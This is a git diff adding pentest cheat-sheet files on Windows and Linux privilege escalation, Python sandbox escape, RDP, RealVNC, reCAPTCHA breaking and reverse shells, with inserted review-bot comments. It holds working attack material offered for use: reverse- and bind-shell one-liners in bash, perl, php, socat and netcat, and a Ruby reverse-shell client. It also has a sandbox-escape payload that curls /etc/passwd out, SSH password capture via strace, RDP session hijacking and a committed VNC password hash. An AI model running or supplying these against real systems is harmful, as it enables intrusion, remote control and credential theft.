+accesschk.exe -uwcqv "testuser" * # registry perms
+accesschk.exe -uwqs users c:\
+calcs "c:\Program Files" /T | findstr Users
+icacls \\hackmedc\docs # determine perms
+
+gpresult /z /h outputfile.html # view GPOs that have been applied to a system
+gpresult /R
+gpresult /Z # verbose
+
+find machines with the gpp (http://www.harmj0y.net/blog/powershell/gpp-and-powerview/)
+
+netsh firewall show state
+netsh advfirewall show allprofiles
+netsh firewall set opmode disable|enable
+
+(gwmi -q 'select * from SoftwareLicensingService').OA3xOriginalProductKey # Windows OEM product key
+
+* list all *.msc progs
+dir c:\windows\system32 | findstr msc
+mmc
+gpedit.msc
+
+autoruns
+sigverif # verif des signatures
+
+* bonus tips
+color 0a
+type \\.\c:\wfmgr.cfg
+psinfo # shows uptime
+xcopy srcdir dstdir /E # cp -r
+
+* am i admin
+dir \\DC\C$
+at \\DC # list scheduled tasks
+
+* moar
+Network Intrusion Process https://scriptjunkie.us/files/networkintrusionpostermed.png
+Build a Secure Network by Matt Weeks @scriptjunkie http://www.irongeek.com/i.php?page=videos/derbycon3/4101-pigs-don-t-fly-why-owning-a-typical-network-is-so-easy-and-how-to-build-a-secure-one-matt-scriptjunkie-weeks (DerbyCon 2013)
+Encyclopedia of Windows Privilege Escalation by Brett Moore (Insomnia) http://www.youtube.com/watch?v=kMG8IsCohHA (Ruxcon 2011)
+The Dirty Little Secrets They Dont Teach You In Pentesting Class, Rob Fuller Chris Gates, part2: https://www.youtube.com/watch?v=JKcs2VuTSJg (DerbyCon 2012) & part1 but p basic: https://www.youtube.com/watch?v=xXqyogdxITE (DerbyCon 2011)
+Exploiting weak folder permissions http://www.greyhathacker.net/?p=738
+Pwn .bat admin scripts that expand %CD% in a directory under our control http://thesecurityfactory.be/command-injection-windows.html
+
+* summary
+http://www.r00tsec.com/2014/10/howto-summary-privilege-escalation.html
+https://www.sock-raw.org/wiki/doku.php/windows_priv_esc
+
+* extract passwords
+http://www.nirsoft.net/utils/bullets_password_view.html
+http://aluigi.altervista.org/pwdrec.htm
+
+* EoP
+https://github.com/koczkatamas/CVE-2016-0051
+
+# linux
+id
+uname -a
+w
+who # usernames not truncated
+last | head -n 50
+last -w
+sudo -l
+getent passwd
+env
+uptime
+
+/etc/passwd
+/etc/shadow
+/etc/group
+/etc/sudoers
+/etc/ssh/sshd_config
+/etc/fstab
+/etc/mtab
+/proc/mounts
+/etc/exports
+/etc/syslog.conf
+/etc/rsyslog.conf
+/etc/issue,motd,system-release,redhat-release,centos-release,lsb-release,os-release,debian_version,SuSE-release, ...
+/etc/cron*
+/etc/anacrontab
+/var/spool/cron* # may vary
+/etc/inetd.conf
+/etc/xinetd.conf
+/etc/sysconfig/iptables # may vary
+
+hostname
+ps fauxww
+ps auxe # show environment
+ifconfig ; ip ad
+netstat -nr
+/etc/hosts
+/etc/resolv.conf
+/etc/nsswitch.conf
+netstat -an
+/proc/net/ip_conntrack
+iptables-save or iptables -S
+
+/proc/version
+/proc/sys/kernel/osrelease
+/proc/sys/kernel/version
+/proc/sys/kernel/hostname
+/proc/sys/kernel/domainname
+/proc/sys/kernel/..
+/proc/net/{tcp,tcp6,udp,unix} | parse_net_tcp.py
+/proc/net/arp # neighbours
+
+/proc/self/environ
+/proc/self/cmdline
+/proc/self/maps
+/proc/self/loginuid
+
+; setuid, setguid files
+find / -type f -perm -4000 \! -type l \! -type b \! -type c \! -type s -ls 2>/dev/null
+find / -type f -perm -2000 \! -type l \! -type b \! -type c \! -type s -ls 2>/dev/null
+
+; world writable
+find / -type f -perm -002 \! -type l \! -type b \! -type c \! -type s -ls 2>/dev/null | grep -v ' /proc/'
+find / -type d -perm -002 -ls 2>/dev/null
+
+; files or groups with no owners
+find / \( -nouser -o -nogroup \) -ls 2>/dev/null
+; symlinks that point to writable file/dir
+
+; find writeable libs called by setuid bins or not
+find / -type f -perm /6000 -exec ls -1 {} \; 2>/dev/null | xargs -i ldd {} | grep -oE '/[^ ]+' | sort -u | xargs ls -Ll | grep -iE '^(....w....|.......w.)'
+
+; find libs with RPATH sections http://seclists.org/fulldisclosure/2010/Oct/257
+while read f; do readelf -d "$f"| grep RPATH && echo "$f" >> /tmp/libs_with_rpath.txt; done < <(find / -type f -perms /6000)
+while read f; do ldd "$f" 2>/dev/null | grep -f /tmp/libs_with_rpath.txt && echo "$f" >> /tmp/bins_with_rpath.txt; done < <(cat /tmp/libs_with_rpath.txt)
+
+; writable outside of the user's HOME
+find / -type f -user $USER -perm /222 -ls 2>/dev/null | grep -vE " (/proc/|$HOME)"
+find / -type d -user $USER -perm /222 -ls 2>/dev/null | grep -vE " (/proc/|$HOME)"
+; only root can read
+find / \( -path /proc -o -path /sys -o -path /dev \) -prune -o -user root ! -perm /004 -ls 2>/dev/null
+
+rpm -qa --last
+
+shellshock
+env x='() { :;}; echo pwn3d' bash -c "blah"
+ssh -o 'rsaauthentication yes’ 192.168.1.1 '() { ignored; }; id'
+
+wildcard attacks https://www.exploit-db.com/papers/33930/
+
+* common paths
+http://wiki.apache.org/httpd/DistrosDefaultLayout, lfipwn/core/techniques/LFIApacheLog.py, exploit-database/platforms/php/webapps/15964.py
+http://www.blackhatlibrary.net/File_Inclusion
+
+* elevate
+.*history
+.*rc
+.ssh / known_hosts, config, authorized_keys{,2}, id_rsa, id_dsa
+.vnc/passwd
+
+https://github.com/b3rito/yodo
+
+grep .*_history for:
+ rsh, rhost, rcp, ssh, scp, ...
+ su -
+ sudo
+identifier les VIP
+
+local root exploits # look at exploit suggesters in tools/post
+sysdig strace systemtab # in tools/post/
+
+backdoor su, sudo, ...
+capture ssh passwords: sudo strace -f -e read -p 2>log OR strace -e write -p 2>&1 | egrep "^write\(.*1\)"
+prettier: strace -p 13909 2>&1 | awk '/^write\(.*1\)/ {gsub(/\"/, "");gsub(/\,/, "");gsub(/\\r/, "\\n");sub(/[0-9]*\)/," ",$2);sub(/\\177/,"\b",$2);sub(/\\t/,"\t",$2);sub(/\\3/,"\^C",$2);printf $2}'
+or python script skl.py from netspi
+
+look into tools/* (eg. lynis)
+
+http://netsec.ws/?p=309 # LinEnum, LinuxPrivChecker, g0tmi1k's blog (http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
+
+# bypassing nosuid, noexec
+CVE-2014-5206/CVE-2014-5207 http://seclists.org/oss-sec/2014/q3/352
+
+# Solaris
+dispuid # display a list of all valid user names
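Review bot: Three commands in this file will not run as written. `reg query HKLM\SYSTEM\Current\ControlSet\Services\SNMP` splits `CurrentControlSet` into two keys (the fDenyTSConnections line higher up has the correct spelling), `calcs "c:\Program Files" /T | findstr Users` should be `cacls`, and the RPATH loop passes `-perms /6000` to find(1), which only knows `-perm` as the SUID/SGID searches a few lines earlier use. The heading `; setuid, setguid files` presumably means `setgid`.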
diff --git a/Cheat Sheet/proftpd b/Cheat Sheet/proftpd
new file mode 100644
index 0000000..5730304
--- /dev/null
+++ b/Cheat Sheet/proftpd
@@ -0,0 +1,4 @@
+# proftpd
+
+* CVE-2015-3306
+http://bugs.proftpd.org/show_bug.cgi?id=4169
diff --git a/Cheat Sheet/prssi b/Cheat Sheet/prssi
new file mode 100644
index 0000000..f86da93
--- /dev/null
+++ b/Cheat Sheet/prssi
@@ -0,0 +1,5 @@
+# prssi (Path-Relative Stylesheet Import) / pro (Relative Path Overwrite)
+
+http://www.thespanner.co.uk/2014/03/21/rpo/
+http://blog.portswigger.net/2015/02/prssi.html real life RPO bug in phpBB
+http://blog.innerht.ml/rpo-gadgets/ bug bounty on google using @import to exfil page contents
diff --git a/Cheat Sheet/python b/Cheat Sheet/python
new file mode 100644
index 0000000..046b07d
--- /dev/null
+++ b/Cheat Sheet/python
@@ -0,0 +1,117 @@
+# python
+
+# pip
+pip install --user -r requirements.txt
+PROTOCOL_SSLv3 error: easy_install --upgrade pip
+
+# virtualenv
+virtualenv .venv
+source .venv/bin/activate
+
+# deep
+http://sebastianraschka.com/Articles/2014_deep_python.html
+
+# decompile
+https://github.com/rocky/python-uncompyle6
+https://github.com/zrax/pycdc
+https://www.fireeye.com/blog/threat-research/2016/04/deobfuscating_python.html uncompyle2 or meta https://github.com/wibiti/uncompyle2 http://srossross.github.io/Meta/html/api/decompile.html
+https://github.com/alex/python-decompiler
+https://sourceforge.net/p/pyinstallerextractor/tickets/5/
+https://sourceforge.net/projects/easypythondecompiler/ used in http://security.szurek.pl/blazectf-2016-postboard-writeup.html
+
+# sandox escape / breaking out of restricted environments
+http://tomforb.es/breaking-out-of-secured-python-environments
+raise BaseException()
+enumerate attributes
+ - use the __dict__ attribute on any class (obvious to restrict)
+ - dir()
+print exit(dir(x)) if str is restricted, exit() turns its parameters into a string
+func_globals is a "reference to the dictionary that holds the function’s global variables — the global namespace of the module in which the function was defined"
+print solve.func_globals["sys"].modules
+for l in solve.func_globals["sys"].modules["io"].FileIO(r'path\to\web.config'): print l
+
+https://doar-e.github.io/blog/2014/04/17/deep-dive-into-pythons-vm-story-of-load_const-bug/
+
+''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()
+''.__class__.__mro__[2].__subclasses__()[59].__repr__.im_func.func_globals['__builtins__']['globals']()"
+''.__class__.__mro__[2].__subclasses__()[59].__enter__.__func__.__globals__['linecache'].checkcache.__globals__['os'].system('curl%20me%20-Ffoo%3d%40/etc/passwd') # bsidessf ctf 2017
+
+python3: bytes(str(__builtins__['__import__'] ('subprocess').check_output('cat'+chr(32)+'...',shell=True))+'\n','utf-8')
+
+# sanbox escape via memory corruption
+https://medium.com/@gabecpike/python-sandbox-escape-via-a-memory-corruption-bug-19dde4d5fea5
+https://conference.hitb.org/hitbsecconf2014ams/materials/D2T1-G-Jacking-AppEngine-based-Applications.pdf
+
+# cool links
+http://www.rafekettler.com/magicmethods.html
+http://www.e-booksdirectory.com/programming.php#python
+
+# dict
+>>> dict(sape=4139, guido=4127, jack=4098) # easier to specify pairs using keyword arguments
+{'sape': 4139, 'jack': 4098, 'guido': 4127}
+
+# module __builtin__
+str() # convertit l'objet en une string
+dir() # affiche les methodes de l'objet
+
+import types
+>>> type(odbchelper) == types.ModuleType
+True
+
+print "\n".join(["%s=%s" % (k, v) for k, v in os.environ.items()])
+print '\n'.join(sys.modules.keys())
+
+# introspection
+getattr(li, "append")("Moe")
+callable(getattr(object, method))
+import statsout
+
+def output(data, format="text"):
+ output_function = getattr(statsout, "output_%s" % format, statsout.output_text)
+ return output_function(data)
+
+# and / or
+and: 'a' and 'b' and 'c' => 'c' # All values are true, so and returns the last value, 'c'.
+ or: If all values are false, or returns the last value.
+
+# os.path
+split, splitext, join, expanduser, isfile, isdir
+[f for f in os.listdir(dirname) if os.path.isfile(os.path.join(dirname, f))]
+files = [os.path.normcase(f) for f in os.listdir(directory)]
+files = [os.path.join(directory, f) for f in files if os.path.splitext(f)[1] in exts]
+
+glob.glob('c:\\music\\*\\*.mp3')
+
+# nested functions
+la fonction ne peut etre appelée que par la fonction dans laquelle elle est définie
+
+# re
+r'\bROAD\b' # raw string pas besoin de faire \\b (word boundary) et r'\t' s'interpret '\t' et non tab
+
+re.VERBOSE
+
+# ipython
+#http://pages.physics.cornell.edu/~myers/teaching/ComputationalMethods/python/ipython.html
+whos
+monobjet? ou ??
+%pdef, %psource, %pfile, %psearch
+
+%pdb # debugger on stacktrace
+%run -d # br on first line mais bug pour l'instant
+%run -p
+
+var = Out[19] ou _19
+exec In[22:29]+In[34]
+
+var = !uname -a
+!echo $var
+
+%edit -p
+%edit _NN
+
+%store
+
+# threads and sigint/keyboardinterrupt
+http://code.activestate.com/recipes/496735-workaround-for-missed-sigint-in-multithreaded-prog/
+
+
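Review bot: The headings `# sandox escape / breaking out of restricted environments` and `# sanbox escape via memory corruption` both misspell "sandbox", which makes the section hard to find by search. In the `output(data, format="text")` example, the `getattr(statsout, "output_%s" % format, statsout.output_text)` default means a mistyped format name silently falls back to text output rather than failing, and `format` shadows the builtin; a comment such as `# unknown format falls back to output_text; consider raising instead` would make that trade-off visible to whoever copies the snippet.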
diff --git a/Cheat Sheet/qrcode b/Cheat Sheet/qrcode
new file mode 100644
index 0000000..7e4eaa1
--- /dev/null
+++ b/Cheat Sheet/qrcode
@@ -0,0 +1,4 @@
+# qr codes
+
+zbarimg
+qrtools
diff --git a/Cheat Sheet/rainbow_tables b/Cheat Sheet/rainbow_tables
new file mode 100644
index 0000000..cdac10b
--- /dev/null
+++ b/Cheat Sheet/rainbow_tables
@@ -0,0 +1,12 @@
+# rainbow crack
+
+## tables
+http://code.google.com/p/rainbowcrack-mc/
+http://code.google.com/p/linuxrainbowcrack/
+
+## rcrack
+# rainbow tables pour casser les empreintes NTLM
+rcracki -l ntlm_hashes /data3/rainbowtables_indexees/ntlm/ntlm_mixalpha-numeric#1-8_0/*rti
+
+# rcrack d'une empreinte MD5
+rcrack /data/rainbowtables/md5/md5_loweralpha-numeric-all-space_1-7/md5_loweralpha-numeric-all-space#1-7_* -h eb384f03fcf9cd0b5bfcefd79bfc7e50
diff --git a/Cheat Sheet/rdesktop b/Cheat Sheet/rdesktop
new file mode 100644
index 0000000..572bfc5
--- /dev/null
+++ b/Cheat Sheet/rdesktop
@@ -0,0 +1,52 @@
+# rdesktop - remote desktop - rdp
+
+# lister les sessions
+qwinsta
+or
+query session
+
+# partage d'un disque, clavier fr, et une "color depth" de 16 NB. à confirmer
+# mais apparemment ça ne marche pas sur XP, mais marche avec 2003
+rdesktop -r disk:tmp=/home/sm/tmp -k fr -g 1024x768 -a 16 1.2.3.4
+windows: \\tsclient\tmp
+
+# Services Terminal Server / remote desktop / TermService
+
+# Conditions pour que le service TermService se lance maintenant et
+# automatiquement apres demarrage (cf. msf3/scripts/meterpreter/getgui.rb)
+
+1) autoriser les connexions
+HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections == 0
+
+2) persistence au reboot
+HKLM\\SYSTEM\\CurrentControlSet\\Services\\TermService\Start == 2
+Ou bien:
+sc config termservice start= auto
+
+3) lancer maintenant
+sc start termservice
+
+4) utilisateur doit etre dans le groupe local Administrateurs ou Utilisateurs du bureau à distance et ne doit pas avoir un mot de passe vide
+ en: net localgroup "Remote Desktop Users" seb /add
+ fr: net localgroup "Utilisateurs du Bureau à distance" seb /add
+
+# MITM de session RDP
+http://isc.sans.org/diary.html?storyid=7303
+
+# take over open session
+# http://blog.gentilkiwi.com/securite/vol-de-session-rdp
+C:\Windows\system32>query session
+ SESSION UTILISATEUR ID ÉTAT TYPE PÉRIPHÉRIQUE
+ services 0 Déco
+ console 1 Conn
+>rdp-tcp#1 user1 2 Actif rdpwd
+ rdp-tcp#0 toto 3 Actif rdpwd
+ rdp-tcp 65536 Écouter
+
+rdp-tcp#0 est la session que nous voulons voler, rdp-tcp#1 est notre session ouverte
+
+sc create givemerdp binpath= "cmd /k tscon rdp-tcp#0 /dest:rdp-tcp#1" type= own
+sc start givemerdp
+sc delete givemerdp # cleanup when finished
+ou
+lancer tscon avec psexec -s
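Review bot: The path `HKLM\\SYSTEM\\CurrentControlSet\\Services\\TermService\Start == 2` mixes doubled and single backslashes, which reads like a Ruby string literal copied from the getgui.rb script cited above rather than a registry path; the single-backslash form used for `fDenyTSConnections` two lines earlier is the one to keep, i.e. `HKLM\SYSTEM\CurrentControlSet\Services\TermService\Start == 2`. The value `2` is consistent with the `sc config termservice start= auto` alternative given below it, so only the escaping needs fixing.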
diff --git a/Cheat Sheet/realvnc b/Cheat Sheet/realvnc
new file mode 100644
index 0000000..68a79b5
--- /dev/null
+++ b/Cheat Sheet/realvnc
@@ -0,0 +1,45 @@
+# realvnc
+
+# disable_blacklist.reg
+Windows Registry Editor Version 5.00
+
+[HKEY_CURRENT_USER\SOFTWARE\RealVNC]
+
+[HKEY_CURRENT_USER\SOFTWARE\RealVNC\WinVNC4]
+"BlacklistTimeout"="0"
+
+# export
+Windows Registry Editor Version 5.00
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\RealVNC]
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\RealVNC\WinVNC4]
+"Password"=hex:ee,5b,0e,48,c8,fe,97,71
+"SecurityTypes"="VncAuth"
+"ReverseSecurityTypes"="None"
+"QueryConnect"=dword:00000000
+"QueryOnlyIfLoggedOn"=dword:00000000
+"PortNumber"=dword:0000170c
+"IdleTimeout"=dword:00000e10
+"HTTPPortNumber"=dword:000016a8
+"LocalHost"=dword:00000000
+"Hosts"="+255.255.255.255/0.0.0.0,"
+"AcceptKeyEvents"=dword:00000001
+"AcceptPointerEvents"=dword:00000001
+"AcceptCutText"=dword:00000001
+"SendCutText"=dword:00000001
+"DisableLocalInputs"=dword:00000000
+"DisconnectClients"=dword:00000001
+"AlwaysShared"=dword:00000000
+"NeverShared"=dword:00000000
+"DisconnectAction"="None"
+"RemoveWallpaper"=dword:00000000
+"RemovePattern"=dword:00000000
+"DisableEffects"=dword:00000000
+"UpdateMethod"=dword:00000001
+"PollConsoleWindows"=dword:00000001
+"UseCaptureBlt"=dword:00000001
+"UseHooks"=dword:00000001
+"Protocol3.3"=dword:00000000
+"BlacklistTimeout"="2"
+
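Review bot: The `"Password"=hex:ee,5b,0e,48,c8,fe,97,71` line in the export is a stored credential committed verbatim; it should be replaced with a placeholder such as `"Password"=hex:<redacted>` before this file is shared. The `"Hosts"="+255.255.255.255/0.0.0.0,"` entry appears to accept connections from any source address and `"ReverseSecurityTypes"="None"` removes authentication on reverse connections, so a comment stating that this export records an observed configuration rather than a recommended one would help a reader who copies it. The first snippet's `"BlacklistTimeout"="0"` presumably disables the failed-login blacklist entirely — worth saying that in the `# disable_blacklist.reg` heading so the effect is explicit.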
diff --git a/Cheat Sheet/recaptcha b/Cheat Sheet/recaptcha
new file mode 100644
index 0000000..fb54a51
--- /dev/null
+++ b/Cheat Sheet/recaptcha
@@ -0,0 +1,35 @@
+# recaptcha
+
+02:19 < lanjelot> hi guys, i'm looking into stiltwakler v2 because the audio recaptcha used by the website i am pentesting gives 3 groups of 3 digits
+02:20 < lanjelot> and sometimes, 1 group of 4 digits and 2 groups of 3 digits
+02:29 < lanjelot> stiltwalkerv2 fails at guessing the 9 digits
+02:37 < lanjelot> i've changed number_of_words_per_piece and number_of_pieces to 3 of course
+02:38 < lanjelot> but the fuckit_splitter fails at splitting the .mp3 correctly i guess, as some of the .wav contain more than 1 digit
+03:30 -!- jeffball [~jeff@c-69-242-197-112.hsd1.sc.comcast.net] has joined #dc-949
+04:54 < lanjelot> i've modified fuckit_splitter.py with pixels[x,y][0] >= 250 and pixels[x,y][1] >= 200 to have 3 groups right away
+04:55 < lanjelot> and i've changed sample_rate = 16000 in splitterbase.py
+04:56 < lanjelot> the different .wav match every digits better now, but the guesses are still all wrong :(
+05:05 < lanjelot> do i need to train the neural network?
+05:31 < jeffball> it's been a while since I trained it, so I aplogize if some steps are incomplete
+05:31 < jeffball> but essentially you need a directory in the format of: solved_clusters/answer/sample.wav
+05:32 < jeffball> where solved_clusters is the root (name it anything), answer is the letter/digit/word that matches all the samples in that directory
+05:32 < jeffball> and sample###.wav is just any filename under that directory. The more samples you get the better
+05:34 < jeffball> then run s-plot/splotitup.sh on it: cd s-plot; splotitup.sh solved_clusters/ dat/ $bitmask
+05:35 < jeffball> where bitmask is the type of data you want to train on. See splot.py for a description. Generally we used 24, but 8 and 32 worked alright too
+05:37 < jeffball> this generates dat/*.csv for each word/digit/letter.
+05:37 < jeffball> *Just noticed s-plot/README.txt*
+05:56 < jeffball> then run generate_ml_inputs.sh, this will convert those csv's into octave's format in trainingsetx.csv, trainingsety.csv, and y_mappings.txt
+05:57 < jeffball> they'll get copied to image-neural-network folder
+05:58 < jeffball> then you can run image-neural-network/trainNN3.m with octave: octave trainNN3.m arguments
+05:58 < jeffball> Usage: octave trainNN3.m inputs hidden iterations save_every name_prefix inputx inputy output
+05:59 < jeffball> and that will create the theta values you can use to solve with.
+06:09 < lanjelot> right, i just remembered downloading the corpus. I understand now why the sample_rate was hard-coded
+06:19 < lanjelot> jeffball: how come the recaptcha that this website is using looks like it could be solved by stiltwalker?
+06:21 < lanjelot> didn't Google roll back reCAPTCHA to the difficult version (for humans) after you released stiltwalker v3?
+06:22 < lanjelot> or is it that reCAPTCHA customers can choose to have an old version, hence usable for blind people
+11:52 < jeffball> reCAPTCHA switched to a had version but then moved towards a different version with just quick numbers, similar to round 2
+11:53 < jeffball> it's different in that the number of digits in each of the 3 sections is varriable (mostly 3 or 4), perhaps to try to mess with the fuckit splitter. Their goal is not that you can't decipher
+ the digits, but that you can't split them. In all honesty it's probably capable of being broken, but we just haven't the time/motivation to release another round
+11:54 < jeffball> if you get splitting to work, do a bnuch of the captchas and retrain, you'll probably break it
+11:54 < jeffball> *switched to a bad version
+12:46 < lanjelot> cool thx for clarifying that up
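Review bot: The join line `jeffball [~jeff@c-69-242-197-112.hsd1.sc.comcast.net] has joined #dc-949` carries a third party's IRC hostmask, which appears to be a residential ISP hostname; it adds nothing to the recaptcha notes and should be dropped or replaced with a placeholder before publishing. Stripping the timestamps and nick prefixes from jeffball's training walkthrough (solved_clusters layout, splotitup.sh, generate_ml_inputs.sh, trainNN3.m) would also make it readable as a procedure rather than a chat log.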
diff --git a/Cheat Sheet/recon b/Cheat Sheet/recon
new file mode 100644
index 0000000..afc5443
--- /dev/null
+++ b/Cheat Sheet/recon
@@ -0,0 +1,19 @@
+# recon / info gathering / OSINT
+
+# DNS lookup for all IPv4 PTR records
+https://scans.io/study/sonar.rdns
+
+# HTTP GET request for all IPv4 hosts with an open 80/TCP
+https://scans.io/study/sonar.http
+
+# domain tool box
+https://w3dt.net/
+
+# social media reconnaissance
+http://raidersec.blogspot.com.au/2012/12/automated-open-source-intelligence.html
+
+# check where a nickname is registered (on what websites)
+http://namechk.com/
+
+# twitter tinfoleak
+http://www.vicenteaguileradiaz.com/tools/
diff --git a/Cheat Sheet/record-screen b/Cheat Sheet/record-screen
new file mode 100644
index 0000000..5a5d50a
--- /dev/null
+++ b/Cheat Sheet/record-screen
@@ -0,0 +1,18 @@
+# record-screen
+
+# to .gif
+byzanz
+
+# mieux que recordmydesktop
+kazam
+
+# recordmydesktop
+recordmydesktop --no-sound --overwrite --pause-shortcut Control+p -o blah.ogv -x 2878 -y 8 --width 1049 --height 613
+ffmpeg -i blah.ogv -c:v libx264 -preset veryslow -qp 0 /tmp/woot.mp4
+
+# gif screencast of terminal
+https://github.com/KeyboardFire/mkcast
+
+# script
+script --timing=plop foo │
+scriptreplay -t plop foo
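Review bot: `script --timing=plop foo │` ends with a stray box-drawing character, which looks like a pasted terminal border and would be handed to script(1) as an extra argument if the line is copied; it should read `script --timing=plop foo`. The `scriptreplay -t plop foo` line below depends on the same `plop` timing file, so the pair is consistent once the artifact is removed.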
diff --git a/Cheat Sheet/redhat b/Cheat Sheet/redhat
new file mode 100644
index 0000000..e6b238d
--- /dev/null
+++ b/Cheat Sheet/redhat
@@ -0,0 +1,4 @@
+# redhat rhn
+
+https://rhn.redhat.com/errata/rhel-server-errata-security.html
+https://access.redhat.com/site/articles/3078
diff --git a/Cheat Sheet/redis b/Cheat Sheet/redis
new file mode 100644
index 0000000..f2ba299
--- /dev/null
+++ b/Cheat Sheet/redis
@@ -0,0 +1,4 @@
+# redis
+
+# message queue (MQ) & broker injection tool
+https://github.com/cr0hn/enteletaor
diff --git a/Cheat Sheet/rest b/Cheat Sheet/rest
new file mode 100644
index 0000000..ce8d908
--- /dev/null
+++ b/Cheat Sheet/rest
@@ -0,0 +1,3 @@
+# rest
+
+https://www.owasp.org/index.php/REST_Security_Cheat_Sheet
diff --git a/Cheat Sheet/reverse-shells b/Cheat Sheet/reverse-shells
new file mode 100644
index 0000000..248246d
--- /dev/null
+++ b/Cheat Sheet/reverse-shells
@@ -0,0 +1,203 @@
+# reverse-shells
+
+# find an outbound port
+http://portquiz.net/
+http://letmeoutofyour.net/
+
+# file transfer over DNS
+https://github.com/breenmachine/dnsftp
+http://breenmachine.blogspot.ca/2014/09/transfer-file-over-dns-in-windows-with.html # DNS tunnel with powershell
+
+# file transfer with uuencode
+http://www.terrencemiao.com/Webmail/msg00022.html
+
+# if on windows and has powershell, use PowerSploit (bonus: will bypass AV)
+http://www.pentestgeek.com/2013/07/19/invoke-shellcode/
+
+# sources
+https://highon.coffee/blog/reverse-shell-cheat-sheet/
+http://www.hsc-news.com/archives/2011/000082.html
+http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+http://bernardodamele.blogspot.fr/2011/09/reverse-shells-one-liners.html
+http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
+fuzzdb/attack-payloads/os-cmd-execution/reverse-shell-one-liners.doc.txt
+https://highon.coffee/blog/reverse-shell-cheat-sheet/
+
+## bind shell with hping and uid 0
+hping -I eth0 -p 22 --listen s3cr3t | /bin/sh
+moi: echo s3cr3t | nc -v victim 22
+
+## le vpn du pauvre
+sshuttle https://github.com/apenwarr/sshuttle
+
+## icmp
+ptunnel (written in c & needs libpcap on client)
+soicmp (written in python & needs pcapy+libpcap on client)
+icmpshell (wirtten in c & no deps, bind shell only)
+icmpsh (client only windows)
+tcpovericmp (https://github.com/Maksadbek/tcpovericmp)
+icmptunnel (https://github.com/DhavalKapil/icmptunnel)
+
+## sctp
+python-pty-shells
+
+## udp
+python-pty-shells, ./udptunnel, pwnat, chownat
+
+## dns
+dnsxss
+dnscat2, dnscat (included in http://www.skullsecurity.org/wiki/index.php/Nbtool)
+iodine
+heyoka
+dns2tcp
+
+## ipv6
+??
+
+## tcp
+# bind shell
+# netcat without -e
+sh -c "mkfifo /tmp/.f;nc -lp 4444 /tmp/.f 2>&1" #beware not all nc support this -lp 1234 syntax
+
+# bind on already used port
+https://github.com/sghctoma/multipass
+
+## reverse shell
+# netcat without
+rm /tmp/f; mkfifo /tmp/f (ou mknod fifo p); nc 10.6.6.6 8888 /tmp/.f 2>&1 #hsc
+rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 >/tmp/f #pm
+
+# telnet (hsc)
+moi: nc -l -p 8888 et nc -l -p 9999
+telnet 10.6.6.6 8888 | /bin/sh | telnet 10.6.6.6 9999
+
+# socat
+moi: socat tcp-l:8888,fork,reuseaddr -
+clt: socat tcp-connect:10.6.6.6:8888 exec:'bash -i',pty,stderr,setsid,sigint,sane #hsc
+
+# socat pty -> proxy CONNECT but surviving the proxy dropping the CONNECT connexion
+moi term1: socat TCP-LISTEN:8888,forever,interval=1,fork file:`tty`,echo=0,raw
+moi term2: mkfifo f; while :; do nc -vnlp 443 < f | nc -vn 127.0.0.1 8888 > f; done
+clt: socat -d exec:'bash -i',pty,stderr,setsid,sigint,sane proxy:192.168.122.1:127.0.0.1:443,proxyport=3128,forever,interval=1,fork
+
+# socat pty -> ssl -> proxy CONNECT
+moi: socat openssl-listen:443,reuseaddr,fork,cert=cert.pem,key=key.pem,verify=0 file:`tty`,echo=0,raw
+clt term1: socat tcp-l:8443,fork,reuseaddr proxy:$PROXY_IP:$MYBOX_IP:443,proxyport=$PROXY_PORT
+clt term2: while :; do socat exec:'bash -i',pty,stderr,setsid,sigint,sane openssl:127.0.0.1:8443,verify=0; done
+
+# socat pty -> http client -> b64 encryption -> dmz proxy -> http server
+moi: server.py
+clt: socat exec:'path/to/client.py proxy.dmz 3128 jmpbox.com 443' exec:'bash -i',pty,stderr,setsid,sigint,sane,echo=0
+
+# bash pty > http client -> b64 encryption -> dmz proxy -> http server
+moi: server.py
+clt: ./client.py 192.168.122.1 3128 10.6.6.6 443 < f | bash -i &>f
+
+# nc-like with pty
+https://github.com/emptymonkey/revsh
+
+# lsv hsc Dec 2014
+clt:
+require 'pty'
+require 'socket'
+
+def doconnect()
+ begin
+ s = TCPSocket.new 'pentest.attaquant.fr', 4444
+ return s
+ rescue
+ sleep(1)
+ retry
+ end
+end
+
+PTY.spawn("/bin/bash") {|r, w, pid|
+ socket = doconnect
+ loop do
+ r_s = select([r, socket]);
+ output = (r_s[0][0] == socket) ? w : socket
+ begin
+ out = r_s[0][0].read_nonblock(1024)
+ output.write(out)
+ rescue EOFError
+ socket = doconnect
+ end
+ end
+}
+
+# bash
+echo salut > /dev/tcp/1.2.3.4/80 # test if disabled
+bash 0&0 2>&0 #hsc
+bash -i >& /dev/tcp/1.2.3.4/1234 0>&1 #pm
+
+# perl
+perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' #pm
+
+perl -e "use IO::Socket; socket(SOCK, PF_INET, SOCK_STREAM,\
+ getprotobyname('tcp'));\
+ if(connect(SOCK, sockaddr_in(8888,inet_aton('10.6.6.6'))))\
+ {open(STDIN, '>&SOCK');open(STDERR, '>&SOCK');\
+ open(STDOUT, '>&SOCK');exec('/bin/sh');}" #hsc
+
+# php
+php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' #pm
+
+php -r '$socket = fsockopen("10.6.6.6",8888,$errno,$errstr,10);\
+ $descriptorspec = array(0 => array("pipe", "r"), 1=> array("pipe", "w"),\
+ 2 => array("pipe", "r"));\
+ $process = proc_open("/bin/sh", $descriptorspec, $pipes);\
+ while(1){ $tocheck = array($pipes[1],$pipes[2],$socket);\
+ $int = stream_select($tocheck,$a =NULL,$b = NULL,0);\
+ if (in_array($pipes[1],$tocheck)) {$input = fread($pipes[1],4999);\
+ fwrite($socket,$input);} if (in_array($pipes[2],$tocheck)) \
+ {$input = fread($pipes[2],4999);fwrite($socket,$input);} \
+ if (in_array($socket,$tocheck)) \
